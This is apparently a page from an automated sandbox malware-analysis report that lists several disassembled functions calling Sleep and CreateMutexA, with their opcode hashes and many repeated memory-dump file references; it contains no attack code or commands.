Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2q
API String ID: 1464230837-1585859237
Opcode ID: 3c9f7a6124c7ad76b7e9f7b90785634ca119a865a49fba14a5260726edd26534
Instruction ID: 272ee8f8233fb6892b7f09437023e895348efb1536b099146ea03f17d678826e
Opcode Fuzzy Hash: 3c9f7a6124c7ad76b7e9f7b90785634ca119a865a49fba14a5260726edd26534
Instruction Fuzzy Hash: 08312CB1B102049BEB18ABB8D888BEDB7A7EB86310F20821DE014D73D5D73949C08712

Function 006BA079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 006BA963
CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981

Strings

T2q, xrefs: 006BA970

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2q
API String ID: 1464230837-1585859237
Opcode ID: 5b90dff792072bd9045144fe2647f8f4aa6deffd50b6114989adb574e30219fb
Instruction ID: ca0a9cd88e8c1a6e4a22d0220ae5d8f9d3c97114d61825e8bde69bbc9d124d20
Opcode Fuzzy Hash: 5b90dff792072bd9045144fe2647f8f4aa6deffd50b6114989adb574e30219fb
Instruction Fuzzy Hash: 1B3127B1B101049BEB18ABBCCC89BEDB7A3EB82314F20821DE014E73D5D73959C08716

Function 006BA1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 006BA963
CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981

Strings

T2q, xrefs: 006BA970

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2q
API String ID: 1464230837-1585859237
Opcode ID: 12068641f0edc2357b37da9e3b23a1ed27e90bf8e59afcb949411b348acc9277
Instruction ID: e9711ea915c9319d887a169afc7999a3c49dba69f3747f1afa19ca2b787d8de2
Opcode Fuzzy Hash: 12068641f0edc2357b37da9e3b23a1ed27e90bf8e59afcb949411b348acc9277
Instruction Fuzzy Hash: 44311AB1B101049BEB18ABBCDC89BEDB7A3EB86310F24422DE014DB3D5D77A49C08716

Function 006BA418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 006BA963
CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981

Strings

T2q, xrefs: 006BA970

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2q
API String ID: 1464230837-1585859237
Opcode ID: 040f91f69a20d8565b94b9a2619e5ddc33ce75c5e5b58f344bcc01477f312b2d
Instruction ID: eb105811ad094543e8c080162c1ce9558beb7fc8f0391bf7659eed51cd663a97
Opcode Fuzzy Hash: 040f91f69a20d8565b94b9a2619e5ddc33ce75c5e5b58f344bcc01477f312b2d
Instruction Fuzzy Hash: F93119B1B112449BEB18ABBCD88DBEDB6A3EB82310F20421CE054DB3D5D77949C08756

Function 006BA54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 006BA963
CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981

Strings

T2q, xrefs: 006BA970

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2q
API String ID: 1464230837-1585859237
Opcode ID: a3ef6a8666368d874e1b2f21a499f2429fc8f2d898ae100da38ebd1847c62321
Instruction ID: 2c326acd24e6111e8535e60bb2f1b36f37fbee30ff25b30716130c700b9f3318
Opcode Fuzzy Hash: a3ef6a8666368d874e1b2f21a499f2429fc8f2d898ae100da38ebd1847c62321
Instruction Fuzzy Hash: AF313BB1B111048BEB28ABBCC889BEDB763EB82314F24821CE054DB3D5D73989C18716

Function 006BA682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 006BA963
CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981

Strings

T2q, xrefs: 006BA970

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
